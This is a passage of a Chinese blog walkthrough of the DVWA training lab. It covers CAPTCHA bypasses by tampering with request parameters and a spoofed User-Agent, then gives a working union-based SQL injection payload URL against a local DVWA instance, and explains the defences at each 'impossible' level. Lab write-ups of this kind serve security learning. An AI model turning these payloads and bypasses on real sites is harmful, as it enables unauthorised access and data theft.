<h2 id="impossible-4"><a href="#impossible-4" class="headerlink" title="impossible"></a>impossible</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">// Where are we going to be writing to?</span><br><span class="line">   $target_path   = DVWA_WEB_PAGE_TO_ROOT . &#x27;hackable/uploads/&#x27;;</span><br><span class="line">   //$target_file   = basename( $uploaded_name, &#x27;.&#x27; . $uploaded_ext ) . &#x27;-&#x27;;</span><br><span class="line">   $target_file   =  md5( uniqid() . $uploaded_name ) . &#x27;.&#x27; . $uploaded_ext;</span><br><span class="line">   $temp_file     = ( ( ini_get( &#x27;upload_tmp_dir&#x27; ) == &#x27;&#x27; ) ? ( sys_get_temp_dir() ) : ( ini_get( &#x27;upload_tmp_dir&#x27; ) ) );</span><br><span class="line">   $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . &#x27;.&#x27; . $uploaded_ext;</span><br><span class="line"></span><br><span class="line">   // Is it an image?</span><br><span class="line">   if( ( strtolower( $uploaded_ext ) == &#x27;jpg&#x27; || strtolower( $uploaded_ext ) == &#x27;jpeg&#x27; || strtolower( $uploaded_ext ) == &#x27;png&#x27; ) &amp;&amp;</span><br><span class="line">       ( $uploaded_size &lt; 100000 ) &amp;&amp;</span><br><span class="line">       ( $uploaded_type == &#x27;image/jpeg&#x27; || $uploaded_type == &#x27;image/png&#x27; ) &amp;&amp;</span><br><span class="line">       getimagesize( $uploaded_tmp ) ) &#123;</span><br><span class="line"></span><br><span class="line">       // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)</span><br><span class="line">       if( $uploaded_type == &#x27;image/jpeg&#x27; ) &#123;</span><br><span class="line">           $img = imagecreatefromjpeg( $uploaded_tmp );</span><br><span class="line">           imagejpeg( $img, $temp_file, 100);</span><br><span class="line">       &#125;</span><br><span class="line">       else &#123;</span><br><span class="line">           $img = imagecreatefrompng( $uploaded_tmp );</span><br><span class="line">           imagepng( $img, $temp_file, 9);</span><br><span class="line">       &#125;</span><br><span class="line">       imagedestroy( $img ); </span><br></pre></td></tr></table></figure>
<p>文件名随机、无法截断，无懈可击。</p>
<h1 id="Insecure-CAPTCHA"><a href="#Insecure-CAPTCHA" class="headerlink" title="Insecure CAPTCHA"></a>Insecure CAPTCHA</h1><p>题目的意思是不安全的验证码，既然如此，就说明这题的验证码是可以被绕过的。如果在前端设计一个严密的、安全的验证码，将会阻止多种攻击方式的进行，但是如果像DVWA里这样不严密的话，绕过就是分分钟的事。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$resp = recaptcha_check_answer(</span><br><span class="line">    $_DVWA[ &#x27;recaptcha_private_key&#x27;],</span><br><span class="line">    $_POST[&#x27;g-recaptcha-response&#x27;]</span><br><span class="line">    </span><br><span class="line">); </span><br></pre></td></tr></table></figure>
<p>DVWA中的验证码认证代码</p>
<p>由于验证码是谷歌的，如果没有魔法上网页面会刷新很久而且不会显示出验证码，不过这不影响解题，因为这题中的验证码就是拿来绕过的。</p>
<h2 id="low-5"><a href="#low-5" class="headerlink" title="low"></a>low</h2><p>审计源码，发现后端将改密过程分为两个步骤，step1是验证验证码是否存在与正确，如果正确，则进入step2进行改密操作。不过由于没有任何验证参数，因此我们可以直接抓包更改step的值进行绕过：<br><img src="https://s2.loli.net/2021/12/13/dxKth9WjNbAeZJm.png"><br>ps.由于没有魔法上网因此这里没有验证码的认证参数</p>
<p>之后通过就可以改密成功了。<br><img src="https://s2.loli.net/2021/12/13/SdzlJx8ZLsfvoXa.png"></p>
<h2 id="medium-5"><a href="#medium-5" class="headerlink" title="medium"></a>medium</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">if( !$_POST[ &#x27;passed_captcha&#x27; ] ) &#123;</span><br><span class="line">    $html     .= &quot;&lt;pre&gt;&lt;br /&gt;You have not passed the CAPTCHA.&lt;/pre&gt;&quot;;</span><br><span class="line">    $hide_form = false;</span><br><span class="line">    return;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>我们发现这个难度下在step2中以POST请求的方式加入了<code>passed_captcha</code>这个参数来验证我们是否进行了step1，不过如果我们知道了这个参数的名字，那么这层防护也将毫无意义，因为只要在抓包页面中补充这个参数就可以了：<br><img src="https://s2.loli.net/2021/12/13/RefnFP4BTZD7hou.png"></p>
<h2 id="high-5"><a href="#high-5" class="headerlink" title="high"></a>high</h2><p>查看源码，发现这次将分步操作改成了单步操作，并且加了一点骚操作进去：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$resp = recaptcha_check_answer(</span><br><span class="line">    $_DVWA[ &#x27;recaptcha_private_key&#x27; ],</span><br><span class="line">    $_POST[&#x27;g-recaptcha-response&#x27;]</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line">if (</span><br><span class="line">    $resp || </span><br><span class="line">    (</span><br><span class="line">        $_POST[ &#x27;g-recaptcha-response&#x27; ] == &#x27;hidd3n_valu3&#x27;</span><br><span class="line">        &amp;&amp; $_SERVER[ &#x27;HTTP_USER_AGENT&#x27; ] == &#x27;reCAPTCHA&#x27;</span><br><span class="line">    )</span><br><span class="line">    </span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>在程序中，只要验证码正确或者满足后面一个条件就可以进行改密操作。由于$resp是我们需要绕过的，因此我们的着手点就在后面那个条件。POST请求一个值为hidd3n_valu3的<code>g-recaptcha-response</code>，并且验证<code>user_agent</code>是否为reCAPTCH，那这也是直接抓包更改就好了：<br><img src="https://s2.loli.net/2021/12/13/zsTHl4VN5SxYuyw.png"></p>
<h2 id="impossible-5"><a href="#impossible-5" class="headerlink" title="impossible"></a>impossible</h2><p>移除了high难度中的可绕过参数判断，并且要求输入原密码，甚至针对CSRF使用了anti-CSRF token，这使得验证码的绕过几乎无解。</p>
<h1 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h1><h2 id="low-6"><a href="#low-6" class="headerlink" title="low"></a>low</h2><p>什么都没有过滤的sql注入，我们先测试发现注入方式为字符型GET注入，并且url最后会有一个<code>&amp;Submit=Submit#</code>，构建payload时不要忘了。但是当我们写入联合注入时，发生了报错：<br><img src="https://s2.loli.net/2021/12/13/HDWCy48nJsYaBNw.png"></p>
<p>经过搜索发现是因为编码混乱导致的错误，因此在构建payload时我们将想要获取的数据以16进制的方式返回即可，构建payload（列数为2）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&#x27; union select 1,hex(concat(table_name)) from information_schema.tables where table_schema=database()--+&amp;Submit=Submit#</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2021/12/13/49wJGjsLXAYF1eQ.png"></p>
<p>查完表名就是一条龙服务了，这里就不演示了。</p>
<h2 id="medium-6"><a href="#medium-6" class="headerlink" title="medium"></a>medium</h2><p>这次把注入方式换成了POST，但是还是没有做过滤，抓包更改POST就可以了，这次改成了数字型注入：<br><img src="https://s3.bmp.ovh/imgs/2021/12/98e805e5a64a1640.png"><br><img src="https://s3.bmp.ovh/imgs/2021/12/636118ac9e7c89b4.png"></p>
<h2 id="high-6"><a href="#high-6" class="headerlink" title="high"></a>high</h2><p>使用了session防止自动化攻击（实际上好像还是能用），但是在手工人面前这种没有过滤的注入毫无意义，直接抓包改包就可以了：<br><img src="https://s3.bmp.ovh/imgs/2021/12/d3ef0a5df4796d92.png"><br><img src="https://s3.bmp.ovh/imgs/2021/12/7dd903480511de87.png"></p>
<h2 id="impossible-6"><a href="#impossible-6" class="headerlink" title="impossible"></a>impossible</h2><p>检测id是否为数字，并且进行预编译，防御拉满，毫无注入可能。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web-DVWA/" rel="tag"># -web -DVWA</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/12/07/%E5%85%B3%E4%BA%8Esql%E6%B3%A8%E5%85%A5%E6%96%B9%E6%B3%95%E7%9A%84%E8%A1%A5%E5%85%85/" rel="next" title="关于sql注入方法的补充">
                <i class="fa fa-chevron-left"></i> 关于sql注入方法的补充
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/12/09/CSRF%E7%9A%84%E5%AD%A6%E4%B9%A0/" rel="prev" title="CSRF的学习">
                CSRF的学习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives%7C%7C%20archive">
              
                  <span class="site-state-item-count">27</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Brute-Force"><span class="nav-number"></span> <span class="nav-text">Brute Force</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#low"><span class="nav-number">1.</span> <span class="nav-text">low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium"><span class="nav-number">2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#high"><span class="nav-number">3.</span> <span class="nav-text">high</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#impossible"><span class="nav-number">4.</span> <span class="nav-text">impossible</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Command-Injection"><span class="nav-number"></span> <span class="nav-text">Command Injection</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#low-1"><span class="nav-number">1.</span> <span class="nav-text">low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium-1"><span class="nav-number">2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#high-1"><span class="nav-number">3.</span> <span class="nav-text">high</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#impossible-1"><span class="nav-number">4.</span> <span class="nav-text">impossible</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CSRF"><span class="nav-number"></span> <span class="nav-text">CSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#low-2"><span class="nav-number">1.</span> <span class="nav-text">low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium-2"><span class="nav-number">2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#high-2"><span class="nav-number">3.</span> <span class="nav-text">high</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#impossible-2"><span class="nav-number">4.</span> <span class="nav-text">impossible</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#File-Inclusion"><span class="nav-number"></span> <span class="nav-text">File Inclusion</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#low-3"><span class="nav-number">1.</span> <span class="nav-text">low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium-3"><span class="nav-number">2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#high-3"><span class="nav-number">3.</span> <span class="nav-text">high</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#impossible-3"><span class="nav-number">4.</span> <span class="nav-text">impossible</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#File-Upload"><span class="nav-number"></span> <span class="nav-text">File Upload</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#low-4"><span class="nav-number">1.</span> <span class="nav-text">low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium-4"><span class="nav-number">2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#high-4"><span class="nav-number">3.</span> <span class="nav-text">high</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#impossible-4"><span class="nav-number">4.</span> <span class="nav-text">impossible</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Insecure-CAPTCHA"><span class="nav-number"></span> <span class="nav-text">Insecure CAPTCHA</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#low-5"><span class="nav-number">1.</span> <span class="nav-text">low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium-5"><span class="nav-number">2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#high-5"><span class="nav-number">3.</span> <span class="nav-text">high</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#impossible-5"><span class="nav-number">4.</span> <span class="nav-text">impossible</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection"><span class="nav-number"></span> <span class="nav-text">SQL Injection</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#low-6"><span class="nav-number">1.</span> <span class="nav-text">low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium-6"><span class="nav-number">2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#high-6"><span class="nav-number">3.</span> <span class="nav-text">high</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#impossible-6"><span class="nav-number">4.</span> <span class="nav-text">impossible</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">liszt_lin</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
